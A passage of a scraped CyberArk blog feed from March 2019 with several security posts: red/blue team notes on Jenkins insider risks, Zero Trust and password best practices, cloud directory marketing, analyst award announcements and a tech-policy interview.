  • Blue Team: The Jenkins admin is a very powerful user in Jenkins. To help mitigate the risk of an insider attack, organizations should extract secrets from Jenkins to the furthest extent possible, placing them in a centralized vault where they can be secured, rotated and controlled. To keep any one person from having all of the secrets, use multiple access tokens stored in different repositories. In extreme cases, use two Jenkins infrastructures, for example, one server for dev and another one for production. You can learn more about this here.

Malicious Insiders: Malicious Pipeline Config User

  • Red Team: The Jenkins pipeline is a suite of Jenkins plugins supporting the implementation of continuous delivery automation in Jenkins. It is a computer-readable expression of all software build stages: build, test and deploy. If a malicious insider has control over a pipeline – either via the Jenkins web user interface or by controlling the Jenkins file – they can request secrets using the functionality provided by the Jenkins credentials binding plugin and receive them in clear text.
  • Blue Team: One way to mitigate risk is to limit the scope of credentials for specific pipeline jobs. Set up the Jenkins folders plugin so that pipelines in one folder cannot access the secrets in another folder.

Interested in learning more? You can check out our full Jenkins research series on the CyberArk Threat Research Blog (or in the individual links below). There you’ll review the Jenkins vulnerabilities discovered by CyberArk Labs and subsequently addressed by CloudBees, examine weaknesses of misconfigured environments and explore best practices for configuring privileged credentials and securing web start agents and plugins:

 

]]>
What March Madness Can Teach Us About Handling a Data Security Breach https://www.cyberark.com/blog/what-march-madness-can-teach-us-about-handling-a-data-security-breach/ Fri, 29 Mar 2019 13:00:45 +0000 https://www.cyberark.com/?p=40493

With March Madness now fully upon us, it’s time to take a few lessons learned from “The Tournament” and apply them to our lives in cyber security. What can March Madness teach us about handling a data security breach?

Lesson 1: Don’t let every month be like March

Last March, CNBC ran a story about how loss of worker productivity during March Madness accounted for roughly $6.3 billion in corporate losses. Just in that month alone! Maintaining worker productivity is a top priority for managers, HR and corporate teams everywhere and it’s clear that time spent watching your bracket get busted means not focusing on other priorities – like customer service and generating revenues.

In business, if critical systems are down, or if workers aren’t able to do their jobs due to operational downtime, then money is similarly lost. The Ponemon Institute, in their 2018 report on the costs of data security breaches, stated that the global cost of a data security breach averages $3.86 million. Keeping business critical systems, applications and accounts up and running is crucial and it’s something that malicious actors often aim to disrupt. In the most common method, the attacker abuses privileged access and jumps laterally until he reaches what he’s looking for. Security teams should have plans in place to define and secure the systems that are most pivotal to business continuity and success so that they don’t contribute to business losses in the event of a data security breach.

Lesson 2: Beware the underdog

Every year, it’s the same story. Some lower ranked team that nobody saw coming knocks off a highly favored powerhouse (sorry Virginia fans). The story runs something like this: anonymous small-town school gets hot from behind the 3-point line and the favorite is unable to recuperate. It happens every year without fail.

Just as no one ever expects to find their favorite team knocked out by a team from nowhere, in security there’s a tendency to assume that, while a data security breach can happen,  there’s no way this could happen to us. In a recent study conducted by CyberArk1, 72% of IT and business stakeholders believe that they can stop an impending data security breach. Whether it’s because of the industry or vertical market they’re in, or the size of the company, no organization thinks that it could possibly happen to them. Until it does.

That same study also indicated that 76% of organizations reported an issue that affected the confidentiality, integrity or availability of their business critical applications in the last 24 months. With an ever-changing threat landscape that’s getting harder and harder for IT and security teams to manage, expect the unexpected and assume that someone or something will land on your network, and on a fast track to your most valuable assets and information. What you do once the attacker gets inside is the real difference between a win and a loss.

Lesson 3: Eventually, the blue bloods reign supreme

Everyone loves a good Cinderella story, especially this time of year. However, the dirty secret is that, when filling out your bracket, you should pick one of the favorites. With only four exceptions, a team that’s been seeded one, two or three has won the National Championship, and nearly 75% of all teams that have ever appeared in the Final Four have been seeded in the top three. That’s because, to be picked as a favorite, they’re typically an experienced team that already knows how to get the job done. While it’s fun to pick the underdog because you like the school’s mascot, when picking the later rounds, you’re typically better off picking the higher ranked, more experienced team to advance.

Experience matters in business just like it matters on the court. Whether it’s a championship game or a post-breach environment, teams and organizations who already know the score in high pressure situations are the ones who perform best on game day. They know how to keep calm in a tight spot, focus, block out the noise and make the strategic decisions to win the game. When the pressure is on, you want someone who has been there before.

 

1 CyberArk EMEA Business Critical Application Survey, 2019

]]>
5 Keys to Securing Business Critical Applications in an Age of Digital Transformation: Keeping Your Organization Running at the Speed of Business https://www.cyberark.com/blog/5-keys-to-securing-business-critical-applications-in-an-age-of-digital-transformation-keeping-your-organization-running-at-the-speed-of-business/ Thu, 28 Mar 2019 17:45:33 +0000 https://www.cyberark.com/?p=40509

The age of digital transformation is upon us. Cloud, virtualization and containerization are becoming mainstream. With all of the buzzwords and technology hype, it is easy to forget the real business drivers behind this age of innovation. Established industries like finance and healthcare are being disrupted by new and nimble startups who have leap-frogged established players with new technologies that bring tremendous competitive advantage with speed to market, flexibility and resiliency. Now, established enterprises are adopting these new technologies to ensure and recapture their market leadership positions. It truly is an exciting time in B2B technology, but what about the engine of the enterprise? Business critical applications are the motor that keep firms running. They too are seeing change with the adoption of cloud and SaaS applications, but are often overlooked when it comes to their security.

 Business critical for a reason

Consider the vast information and applications within your organization. Depending on your line of work and industry you will have your own list of critical business applications and related data that if compromised or lost, put your business at a stand-still.  These can include applications like financial transaction apps and their related sensitive customer data; enterprise resource planning (ERP) applications that help manage crucial inventory for retailers or hospitals or critical electronic health record (EHR) applications storing vital electronic personal health information (ePHI) for health care providers, hospitals and insurers.

But how do organizations secure all of this sensitive information and the applications that store and manage it? Unfortunately, many business and IT stakeholders are finding themselves in a risky position. While they are doing a great job curating the right applications for their needs, they are missing the boat on protecting these costly investments that run their enterprises – and drive customer relationships.

According to a recent CyberArk Business Critical Application survey of 1,450 business and IT decision makers conducted across eight EMEA countries, 61% indicated that even the slightest downtime affecting their business critical applications would be massively disruptive and severely impact the business. Yet, 70% of these enterprises do not prioritize the security of business critical applications. So what can you do to help bridge this gap? CyberArk just released an eBook, “The Age of Digital Transformation: 5 Keys to Securing Business Critical Applications,” to answer your questions. Here is a preview of the first two points.

1. Identify what apps are truly business critical

As a security leader, it goes without saying that you need to be one with the business. Get to know your line of business leaders and the leaders of key functions such as finance, human resources and marketing. Once you have a handle on important business initiatives, you will be in a better place to identify the business apps that are truly critical. These could be SaaS applications or even custom applications built using DevOps tools and methodologies.

 2. Get comfortable with the cloud (and securing it)

Understand what your cloud strategy, migration plan and timelines are for on-premises applications that are moving to the cloud or new cloud-native applications. Partner with cross-functional stakeholders to ensure privileged access management is a front-and-center consideration when you’re looking to migrate applications to the cloud or to adopt new cloud applications.

To learn about keys three through five and find out more about securing business critical app, download the eBook here.

]]>
Rethinking Your Approach to Your Enterprise Directory https://www.cyberark.com/blog/rethinking-your-approach-to-your-enterprise-directory/ Thu, 28 Mar 2019 17:31:38 +0000 https://www.cyberark.com/?p=99359

Fueled by advances in technology and widely-recognized business benefits, many organizations today are actively moving to cloud-based applications, platform services and infrastructure as a service.  This trend, coupled with an explosion in mobile computing, means that IT must increasingly enable access of these applications, services and infrastructure anytime, anywhere. There are also new complexities related to digital transformation projects across the enterprise, which often involve building new web presences, online business models, applications for employees, partners and consumers. In turn, these paradigm shifts are encouraging CEOs, CIOs and IT organizations to rethink their traditional approaches to many foundational services within the organization.

One such foundational service is the enterprise directory – the single source of truth for all identity information related to individuals (employees, contractors, partners, consumers), endpoints (mobile devices, workstations and laptops) and even infrastructure (servers, network devices, etc.). Traditionally, most organizations have invested in building out a legacy enterprise directory framework based on an on-premise Microsoft ActiveDirectory (AD) or other directories based on Lightweight Directory Access Protocol (LDAP). While these frameworks served organizations well in the on-premises world, they fall short of enabling an organization to truly embrace the cloud and mobile world.

Designing, deploying and managing this legacy enterprise directory framework comes with extensive requirements to invest in people, processes, technologies and infrastructure. This in turn creates significant opportunity cost to any enterprise looking to extend their competitive advantage through new and forward-looking technology investments. These legacy frameworks also are limited in their authentication and authorization capabilities, especially in the new cloud world. Cloud applications and services increasingly leverage new protocols such as SAML, OpenID Connect, OAuth 2.0, as opposed to using traditional mechanisms like Integrated Web Authentication (IWA) using Kerberos or NTLM. These services are also limited in their ability to support the modern BYOD (Bring Your Own Device) and BYOI (Bring Your Own Identity) where individuals are consuming the organization’s services using their own devices and using their own identities from platforms that may include Facebook, Twitter, LinkedIn and others, in addition to federated services.  Similarly, managing and securing access to cloud IaaS like AWS, GCP and Azure too can be a challenge with these legacy frameworks.

Designed precisely with this paradigm shift in mind, Idaptive’s Next-Generation Cloud Directory addresses many of the challenges detailed above. A highly scalable, performant and turnkey cloud service, the Idaptive Cloud Directory can scale up to tens of millions of users and devices, enabling organizations to deliver web-scale digital experiences to their consumers, employees, contractors and partners. The Directory supports comprehensive User and Device Management and Role Based Access Control through a Policy-Based framework that applications and devices can leverage to drive superior access security and demonstrate compliance. The Cloud Directory, along with the Idaptive Next-Gen Access Platform, also enables authentication via new protocols like SAML, OpenID Connect. OAuth 2.0, etc. while supporting legacy protocols like IWA.

CyberArk Idaptive’s market leading Adaptive Multi-Factor Authentication service is deeply integrated with the Cloud Directory, enabling organizations to implement stronger authentication assurance and risk-based access to applications and devices. Lastly, Idaptive’s Identity Lifecycle Management services, built to leverage the Cloud Directory, enable seamless provisioning from and to the Cloud Directory into Line of Business applications like Box or HR systems like Workday and BambooHR. And with an API interface that enables all interaction with the directory to be done via APIs, and an enterprise grade Secure Token Service integrated with the Directory, the directory enables not just IT admins, but also developers to integrate their applications with it.

The Cloud Directory will also soon deliver a brand-new paradigm called Brokered Authentication. Using Brokered Authentication, the Cloud Directory can serve as a virtual directory, allowing users to login to applications, endpoints and services using their existing enterprise credentials (AD or LDAP), enabling a seamless transition from an existing legacy directory to the Idaptive Cloud Directory.

If you’re looking to try the Idaptive Next-Gen Cloud Directory and accelerate your cloud and mobile first initiatives, sign up for our free trial here.

]]>
HiMSS Conference: Adding an “S” for Security? https://www.cyberark.com/blog/himss-conference-adding-an-s-for-security/ Wed, 27 Mar 2019 13:34:21 +0000 https://www.cyberark.com/?p=40145

Health Information and Management Systems Society (HiMSS) is one of the largest healthcare member organizations in the world and its annual HIMSS conference is renowned as the premier industry event to learn about innovative healthcare technology. One of the rapidly growing areas of interest for healthcare organizations is security, particularly as attackers continue to target providers to compromise the trove of electronic personal health information (ePHI) that providers maintain.

Having attended many technology conferences over the past several years, I found the booths and exhibition floor of this year’s HiMSS conference to be more creative and interactive than almost any other show. From a session standpoint, a few common themes emerged. First, it is clear that the explosion of network connected medical devices is dramatically expanding the attack surface, and IT and security teams at healthcare providers are challenged to keep pace and maintain the security of their privileged accounts. Second, adhering to compliance requirements and “passing the audit” remains the primary driver for healthcare organizations’ investments in IT solutions – perhaps competing with security investments to some extent.  The third trend that stood out was that providers are still trying to find solutions that enable teams to automate low-level work, so that they can spend their time on higher value tasks. None of this is necessarily a surprise to those familiar with the challenges in healthcare, but I did find something that surprised me – but, it wasn’t at a session.

In fact, I was elated to find that most of the discussions we had at the show were with attendees who had senior security titles. I was immediately curious about their motivation for attending and found that most of those I spoke with were within their first year leading security for their organization. Many of these professionals have held senior security positions in other industries, but had recently been brought on to lead security efforts because the provider’s board and C-level executives are now prioritizing proactive, sustainable security programs. There seemed to be consensus among the security pros I spoke with that they were facing the same challenges I heard about in the sessions. However, I was invigorated to find out that this new group of cybersecurity leaders were ready to think long-term about building a cybersecurity programs to defend against emerging threats, rather than focusing on short-term strategies to avoid failed audits.

Therefore, back to my initial question – while I do not think there will be an extra “S” added to the HiMSS conference acronym soon, I firmly believe that the industry’s overall evolution from audit drivers, to an emphasis on security strategy will continue to drive impactful discussions. I’m already looking forward to next year!

]]>
Zero Trust Part II: The Evolution of Trust and Five Key Considerations https://www.cyberark.com/blog/zero-trust-part-ii-the-evolution-of-trust-and-five-key-considerations/ Tue, 26 Mar 2019 13:00:37 +0000 https://www.cyberark.com/?p=40074 Zero Trust

This is the second half of a two part series on Zero Trust. Find the first part here.

The Russian proverb ‘trust, but verify’ was not only used for Nixon’s presidential campaign, but it’s been leveraged many times over to describe Zero Trust.  But, the definition of trust in this context has certainly evolved. The ‘trust, but verify’ adage probably needs an update to something more appropriate like ‘Trust, but verify and re-verify’ and keep re-verifying and adding layers of security until you establish true Zero Trust.

A logical progression from trust to Zero Trust begins with trusting the actual identity (be it a human or machine identity). Then, instead of trusting the entity, you trust the asset that the entity accesses and set up controls (e.g. security certificates or scanning devices) that ensure that the asset can be trusted on the network. defense-in-depth, layered approach is instrumental to a true Zero Trust strategy.

We recommend the following five steps for building out modern architectures that align to Zero Trust:

1) Implement a Risk-based Approach to Security

End users, applications, data and infrastructure no longer exist solely within the confines of the data center and corporate office space and you can’t control what you don’t own. The “Castle and Moat” approach is a non-consideration in this model. Organizations need to secure their enterprise at the core, which starts with securing the privileged access pathway.

Insider threat and external attacks continue to persist, affecting every industry and often involve the misuse of privilege1. The core of what we do at CyberArk is to empower organizations to take a risk-based approach to a better security posture, enabling organizations to implement their strategy over time and focus on what matters most first. Your first priority should be securing your last line of defense, which is privileged access, since it’s the road most traveled by internal and external nefarious characters.

CyberArk is established as the leader for protecting against privileged account compromise – wherever those accounts exist – on premises, in the cloud and everywhere in between. CyberArk provides the controls you need to take a risk-based approach to security.  We’ve developed a programmatic approach designed to help organizations improve security and reduce risk by establishing and maintaining strong privileged access management hygiene. Taking a programmatic approach that incorporates a thorough understanding of the risk your organization is challenged with, as it relates to Zero Trust, and building off of it is key.

2) Continuous Multi-step Authentication and Security to Tier0 Assets

As investment in perimeter security has had diminishing returns over time, there’s an even more accelerated need for stronger security on administrator access to Tier0 assets. Single factor authentication is a single point of failure, leveraging Multi-factor Authentication (MFA) narrows the focus of trust for users and devices.

Beyond MFA, introducing things like step-up authentication and managerial approval processes before allowing access to critical assets and resources is essential for Zero Trust. These technologies allow for the authentication of privileged users at the exact point of access to sensitive assets, dramatically mitigating risk from privileged credential-based attacks.

With traditional VPN solutions, organizations are forced to provide all or nothing access to the perimeter. The issue becomes even more challenging if temporary access needs to be provided to external vendors. It’s important to consider scenarios that involve multiple access types, including third parties and remote vendors, and to provide an improved remote user experience with modern authentication techniques to secure access to corporate resources and applications.

Both Zero Trust and Google’s BeyondCorp models require consistent, continual authentication and access management for users logging into mission and business critical applications, including the CyberArk Privileged Access Security Solution. Ensure authorized privileged users are on secure devices when accessing their accounts as well as Tier1 and Tier0 assets. Continuous multi-step authentication will increasingly become a part of every effective security program and not limited to just Zero Trust.

3) Secure Core Privileges on Endpoints and Endpoint Devices 

One of the main pitfalls and short comings of implied trust is that if someone gets a foothold on an endpoint, they, essentially, become that user (be it standard or privileged user). In the event an attacker or malicious insider gains access to a privileged account and its associated credential, they will become indistinguishable from a fully validated and trusted user. This makes it difficult to detect high-risk activity and behavior.

Application control becomes an important factor in the ‘trust, but verify and re-verify’ methodology. Organizations should implement restriction models that only trust specified applications, run by specific accounts and under specific circumstances. Application control will help mitigate the risk of ransomware attacks and code injections (among others) and is a foundational component of a Zero Trust strategy.

Beyond identifying all human and machine users, discovering and classifying any and all assets, both software and hardware, within the enterprise is important.  It’s important to understand your device health across the enterprise – know your device fleet!  Get a handle on which software versions you’re running and establish security configurations such as screen lock and disk encryption on all of your devices under management.  Ensure device trustability and wrap centralized policy around it – e.g. management status, software versions, security properties, etc.

Zero Trust is just the beginning. Start by providing ‘initial trust’ and continue to verify and re-verify and put controls in place to mitigate risk. Introducing controls on the endpoint provides some level of trust, but securing and monitoring the privileged pathway takes you that much further towards true Zero Trust.

4) Secure and Monitor the Privileged Pathway

Trust, verification and monitoring network traffic are three main elements of both Zero Trust and BeyondCorp. Key indicators of malicious activity are often overlooked or mischaracterized as benign due to an implicit trust that malicious activity will be flagged by detection mechanisms2.

With traditional perimeter models, there’s always a way in and out of a network. Visibility is important. Detection, response, remediation and recovery are even more important. Monitoring the privileged access pathway prevents malicious insiders and external attacks from progressing their attack. Place tight controls around what end users are accessing and monitor, detect, respond and remediate before the business suffers irreparable damage.

Create isolation layers between endpoints, users and target systems and monitor access – specifically the “who, what and when.” Create secure connections for end users connecting to critical assets and resources and make sure you have the ability to review the session in real-time. Identify and pre-define the key indicators of malicious activity and implement automated controls to respond when it’s necessary to take action. As more and more employees work from remote locations and from uncontrolled devices, having the ability to provide application isolation layers to protect corporate resources from these uncontrolled devices is critical to Zero Trust.

CyberArk provides rich analytics out-of-the-box that couples deterministic algorithms, statistical modeling, machine learning and behavior profiling to enable the organization to make calculated decisions based on both trust and risk. Combining intelligent analytics and response results in a force multiplier that inherently scales security proficiency, especially where resource constraints present an issue to the business.

5) Implement Attribute-based Granular Access Controls

Knowing who (for both human and non-human users) has access, to what and which actions they are able to perform is vital. Enforce attribute-based access control that combines enterprise-level policy with specific user criteria.

Enforce governance and the principle of least privilege over everything and control what users and applications are able to do. For human users, enforce both access and active controls. This doesn’t just mean access control in the traditional sense, but also placing controls around privileged task activities and management.

Going beyond least privilege enforcement, organizations should create active controls that allows privileged users to execute certain, pre-defined tasks while blocking activities that present a high risk to the organization. Zero Trust concepts need to be applied to applications. If not users will have the ability to gain access to the application and, in the event that the application has the credential hardcoded, they can spoof it and validate the application. Then it’s game over.

The evolution of perimeter security has undoubtedly influenced the principles of Zero Trust, and the foundation of privileged access management draws a tight analogy, as it’s very much connected to these same principles. You cannot achieve true Zero Trust without incorporating privileged access management controls at the core of your strategy.

To learn more about Zero Trust, watch the Implementing Privileged Access Security into Zero Trust Models and Architectures webinar.

 

References:

1 – Verizon, 2018 Data Breach and Investigations Report, March 2018

2 – FireEye, 2018 M-Trends Report, April 2018

 

]]>
KuppingerCole Analysts Names CyberArk an Overall Privileged Access Management Leader https://www.cyberark.com/blog/kuppingercole-analysts-names-cyberark-an-overall-privileged-access-management-leader/ Mon, 25 Mar 2019 14:29:44 +0000 https://www.cyberark.com/?p=39856

Today, independent analyst firm KuppingerCole Analysts released its 2019 “Leadership Compass: Privileged Access Management” report. Maintaining our overall leadership position for four consecutive years, CyberArk surpassed 19 other evaluated vendors, demonstrating advantages across product, innovation and market evaluation categories.

According to KuppingerCole lead analyst Anmol Singh, “Privileged Access Management, over the past few years, has become one of the most relevant areas of cybersecurity associated with IAM (Identity and Access Management) that deals with identifying, securing and managing privileged credentials across an organization’s IT environment. Once considered a technology option for optimizing administrative efficiency by managing passwords and other secrets, [it] has evolved into a set of crucial technologies for preventing security breaches and credential thefts.”

The prestigious Leadership Compass report provides a comprehensive view of the Privileged Access Management marketplace and aims to help security and IAM leaders identify the privileged access management solutions with the greatest impact on cybersecurity. The CyberArk Privileged Access Security Solution was recognized by KuppingerCole for capabilities including:

According to the report, “CyberArk remains the vendor of choice for global organizations seeking a comprehensive, market-leading privileged access management solution for complex requirements.” Identified as “the most prominent vendor” in the market, we are honored to be recognized for our “focus on constant innovation” as we help customers proactively protect against advanced cybersecurity threats and adopt digital transformation strategies with confidence.

This market leadership recognition comes on the heels of the 2019 RSA Conference 2019, where CyberArk was named the 2019 SC Award winner for Best Enterprise Security Solution, once again reinforcing privileged access as an enterprise security priority.

You can download a complimentary copy of the KuppingerCole Privileged Access Management Leadership Compass report here. To learn more about what sets CyberArk apart, visit here.

]]>
CyberArk Named a Gartner Peer Insights Customers’ Choice for Privileged Access Management https://www.cyberark.com/blog/cyberark-named-a-gartner-peer-insights-customers-choice-for-privilege-access-management/ Thu, 21 Mar 2019 13:00:54 +0000 https://www.cyberark.com/?p=39720

CyberArk is excited to announce that we have been recognized as a March 2019 Gartner Peer Insights Customers’ Choice for Privileged Access Management *

CyberArk was recently named a Leader in the first-ever Gartner Magic Quadrant for Privileged Access Management1.

According to Gartner, “The Gartner Peer Insights Customers’ Choice is a recognition of vendors in this market by verified end-user professionals, taking into account both the number of reviews and the overall user ratings.” To ensure fair evaluation, Gartner maintains rigorous criteria for recognizing vendors with a high customer satisfaction rate.

CyberArk users have highly ranked the CyberArk Privileged Access Security Solution on Gartner’s Peer Insights review site, includ

“Our overall experience with CyberArk has been exceptional from planning implementation through to steady state.”

Security Project Manager, Services Industry

Read the review

“CyberArk’s support and account resources are extremely knowledgeable, and a pleasure to work with. They want to help you achieve your security goals, but do so in a way that show they understand the challenges we deal with on a daily basis.”  

Security and Risk Management, Finance Industry

Read the review

To our customers who submitted reviews, thank you! We are grateful for our enthusiastic customers around the world, and look forward to continued collaboration as we work together to reinforce privileged access management as a top security priority. If you have a CyberArk story to share, we encourage you to share your experience via the Gartner Peer Insights program. Click here to submit a review.

 

1 Gartner, Magic Quadrant for Privileged Access Management, Felix Gaehtgens, Dale Gardner, Justin Taylor, Abhyuday Data, Michael Kelley, 3 December 2018

The GARTNER PEER INSIGHTS CUSTOMERS’ CHOICE badge is a trademark and service mark of Gartner, Inc., and/or its affiliates, and is used herein with permission. All rights reserved. Gartner Peer Insights Customers’ Choice constitute the subjective opinions of individual end-user reviews, ratings, and data applied against a documented methodology; they neither represent the views of, nor constitute an endorsement by, Gartner or its affiliates.

Note: Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

]]>
The Future of Passwords Isn’t Looking Bright – But We Still Have to Secure Them https://www.cyberark.com/blog/the-future-of-passwords-isnt-looking-bright-but-we-still-have-to-secure-them/ Tue, 19 Mar 2019 13:30:05 +0000 https://www.cyberark.com/?p=39326

Many security and IT professionals consider passwords to be the weakest link in their company’s defenses – and that’s for a good reason. The lack of strong passwords, a failure to change (or rotate) passwords on a regular basis, human error and the most significant flaw — password reuse — are among the main issues. Passwords are frequently the first line of defense. They are a defense for the endpoint – the workstation, laptop or smartphone where you start your workday. This is your first point of contact with your organization’s system and, if compromised, it is an attacker’s first point of entry as well. A compromised endpoint is the first step in an attack, so any flaw in its security defenses is serious.

Because of this, many companies are looking for a way to kill the password once and for all. Google just initiated a “passwordless” pilot program that provides remote access to their employees. Microsoft already declared “an end to the era of the password” at its 2018 Ignite Conference. Yahoo tried to kill the password back in 2015 with their “Account key,” which was a push feature.

Think about the most common types of attacks we see today – sophisticated phishing and spear phishing attacks, brute force attacks, social engineering and malware exfiltration attacks. They all have one thing in common. Every single one of these attacks is trying to steal someone’s password – more specifically, privileged credentials.

It’s not surprising that there have been any number of attempts to replace the password and a few of these – such as biometrics-based approaches like facial recognition and fingerprint scans – have seen some adoption. While these innovative alternatives will be adopted over time, it is going to take some time before we reach a passwordless nirvana.

Here are some of best practices for IT admins and security teams to make sure end-user passwords are not compromised in the meantime.

Fact: Every single character you add in your password increases the difficulty for hackers to crack it.

Use a strong password – Strong passwords contain several different types of characters and, consequently, require more effort and time for an attacker to hack. Passwords should contain at least 10 characters and include a combination of character types, such as commas, percent signs and parentheses, as well as upper-case and lower-case letters and numbers.

Fact: More than half of IT professionals reuse passwords across five or more accounts.1

Use a unique password for each service and account – If you re-use passwords on multiple sites or accounts, even if your password is complex enough and long, all it will take is for one of your accounts to be compromised to make all of your other accounts vulnerable.

Fact: Multi-factor authentication provides an extra layer of security that is hard for attackers to crack.

Use multi-factor authentication – This means that multiple types of authentication – not just a password – are required to unlock the account. The first part of the authentication process requires something the user already knows, like a password. The other part of the authentication process involves something the user doesn’t already know, such as a code sent to the mobile phone by authentication software or created by a designated application on the phone.

This code becomes the other half of your login authentication. Now, even if attackers manage to get your password, without the other part of the authentication, they still don’t have access to your account.

Fact: Rotating local admin passwords reduces risk at the endpoints

Address the risk of local admin accounts on workstations-Weak passwords and end users with local admin rights on their workstations represent a significant security risk for organizations.  Many attacks start on endpoints where attackers initially gain access through a phishing attack or when an employee inadvertently downloads and executes a malicious application.

In many cases, an attacker’s aim is to compromise the privileged credentials that reside on workstations. Privileged credentials – such as admin rights – can allow attackers to move laterally until they can secure credentials to system with sensitive PII or intellectual property. To reduce this risk, as a first step, organizations should rotate local admin credentials (including the OS build in local account) on a periodic basis as an important security measure. Over time, organizations should consider removing local admin rights from end user workstations altogether to further reduce the risk of attacks from the endpoint.

Learn how CyberArk solutions can block and contain threats at the endpoint. Download the Endpoint Privilege Manager Solution Brief, try our free 30 days trial or request a demo.

 

1Ponemon Institute, “The 2019 State of Password and Authentication Security Behaviors Report,” January 2019.

https://www.yubico.com/wp-content/uploads/2019/01/Ponemon-Authentication-Report.pdf

]]>
MassTLC 2019 DC Fly-In Takes Tech Advocacy to a Higher Plane https://www.cyberark.com/blog/masstlc-2019-dc-fly-in-takes-tech-advocacy-to-a-higher-plane/ Thu, 14 Mar 2019 15:26:10 +0000 https://www.cyberark.com/?p=38176

CyberArk is a member of the Massachusetts Technology Leadership Council (MassTLC), an industry consortium of 500 organizations. Every year, MassTLC joins their counterparts across North America to attend the Computing Technology Industry Association (CompTIA) Fly-In. MassTLC invites a select group of technology leaders to join them for this conference and Capitol Hill visits to talk to legislators and educate them on the most important issues facing the technology community. For the past two years, Adam Bosnian, EVP of Global Business Development at CyberArk, has attended the DC Fly-In as a representative from CyberArk.

Three areas where the MassTLC delegation focused are– infrastructure, talent and data privacy. Bosnian advocated for improved infrastructure. The delegation to Capitol Hill was ten people – Tom Hopcroft, president and CEO of MassTLC; Sara Fraim, director of policy for MassTLC; and representatives from top technology companies and start-ups in Massachusetts.

The group spoke with Senator Ed Markey, Congresswoman Lori Trahan, Congressman Joe Kennedy, Congresswoman Ayanna Pressley, Congresswoman Katherine Clark and representatives for Congressman Stephen Lynch and Congressman Seth Moulton. With each representative, the group had approximately 30 minutes to make their case.

After Adam returned from DC, I asked him a few questions about his experience.

When you went to talk with the legislators, what did you advocate for?

Very often infrastructure legislation is mostly focused around transportation. CompTIA’s position is that when you’re working on infrastructure bills, you need to consider smart technologies and funding for those technologies. You can imagine this to be things like sensors in roads or cars.

I said that while we absolutely want to put dollars into smart technologies, we shouldn’t forget money to refresh the backend systems that are supporting things like energy grids and public utilities. Currently, those backend systems can’t support smart technologies.

As we refresh those backend systems, it will also allow us to put cybersecurity on those systems. Today, the grid is running on technology that’s at least 20 to 30 years old. We can’t adequately apply cybersecurity controls to it. Almost every legislator said that they’d heard a briefing regarding the grid and how it’s susceptible to attack.

Modernizing the backend provides not just an infrastructure modernization benefit, but also a national cybersecurity benefit.

So, where does CyberArk fit in? We primarily focus on securing the data center and the IT side of the house. But all of the problems that we solve on the data center side exist on the operational technologies side of the house – consider manufacturing production lines, managing power lines or the power grid itself.

What we’re seeing is that there are vulnerabilities on the operational technology side that are not being addressed. Very often they can’t be addressed without modernizing or refreshing the backend technology. They’re not being refreshed or modernized because it costs a lot of money and, if the generation unit is working, companies don’t have any incentive to fix it. But, the “if it ain’t broke don’t fix it” mindset doesn’t apply when it comes to national security and support a more resilient national security posture.

What can we do here and now to affect policy in a positive way?

The problem we have is that, while we can highlight the cybersecurity problem to the utility and the utility may even agree that it’s a problem, without regulation motivating them to fix it, they aren’t necessarily going to fix it in a timely manner without some kind of incentive. So, I do feel that CyberArk has a responsibility to both shine a light on the industry to show what needs to be improved and to work with key stakeholders to influence an environment that allows and empowers organizations to solve the problem.

What role do you see CyberArk having in this going forward?

I think we should find ways to be more involved in national, if not international-level initiatives, whether that’s through something like CompTIA or being part of the Identity Defined Security Alliance (IDSA) or something like Cyber Threat Alliance. I think we have a responsibility as a leading company in the cybersecurity space to use our position and our voice to highlight areas that need more attention and prioritization.

What issue in cybersecurity do you most want to advocate for?

I don’t think we talk about cybersecurity in the schools enough. We barely talk about programming at the schools, never mind cultivating the next generation of cybersecurity-aware students and future professionals. Cybersecurity is interesting, cool stuff and I think we should expose more kids to what we do.

I just don’t think people even think about cybersecurity as an alternative career path, because we’re not in the elementary schools, the middle school and the high schools talking about what cybersecurity is. In their minds, cybersecurity is something that just gets in the way of their day-to-day activities with their phone, laptop or iPad. But, it’s so much more than that. I don’t think we bring it home in a consumable way for a broader set of people to help them really get it. That’s something I’d like to help change and advocate for.

]]>
Zero Trust Part I: The Evolution of Perimeter Security   https://www.cyberark.com/blog/zero-trust-part-i-the-evolution-of-perimeter-security/ Tue, 12 Mar 2019 13:32:14 +0000 https://www.cyberark.com/?p=38054 Zero Trust

A Brief History of the Zero Trust Model

Established back in 2010 by industry analyst John Kindervag, the “Zero Trust model” is centered on the belief that organizations should not automatically trust anything inside or outside its perimeters; instead, it must verify anything and everything trying to connect to its systems before granting access. To quote the infamous Marxist dictator Joseph Stalin, “I trust no one, not even myself.” Essentially, the same rules apply to this concept.

In the wake of the U.S. Office of Personnel Management (OPM) breach, the House of Representatives strongly recommended government agencies adopt a Zero Trust framework to protect their most sensitive networks from similar attacks. Market research shows Zero Trust models, and the technologies that support them, are becoming more mainstream and readily adopted by enterprise-level organizations worldwide. When organizations like Google create and implement their own flavor of Zero Trust, BeyondCorp, people start to pay attention.

This two-part blog will first focus on how perimeter security has changed over time and how the importance of securing privileged access has increased in line with this change. The second installment will highlight five critical considerations for modern architectures.

The (D)evolution of the Perimeter

In the beginning, maintaining a high-level of protection from cyber threats was very much focused on securing the perimeter. This was the golden age of firewalls, VPNs and DMZs (Figure 1.) Trust was, essentially, established and defined by the perimeter. At this point in time, the lifeblood of the company existed almost exclusively within the physical walls of the organization. The belief was that if you’re connected to the network, then you are trusted. If you’re an employee of the company, then you can’t go rogue. In these early days, organizations focused on perimeter security to prevent things like network intrusion, malware, phishing, denial of service and zero day attacks. This is all well and good, but this traditional “Tootsie Pop” model (remember those commercials?) featured a strong exterior where the focus was placed almost exclusively on the perceived threat from the outside, but completely ignored the soft, chocolaty goodness directly in the middle.

Figure 1. The golden age of the firewall, when users, applications, data and Tier 0 assets all resided within the physical walls of the organization.

 

Over time, we ultimately punctured this traditional security bubble – effectively bringing the problems inside, which meant redefining our sense of trust and appropriate controls. First, users transformed into digital nomads, abandoning their corporate or branch locations to become fully remote employees. We then opened up our networks to consumers so that they could use our applications, leading to extranets and moving another layer of the concentric circles in Figure 1 to the outside. For example, with VPN connections, organizations often allow half of the traffic to go directly outside and half through the VPN to access the organization’s applications. This VPN connection inherently trusts the user’s machine and, by connecting to those machines, potentially subjects itself to malware, which can then spread itself through the network.

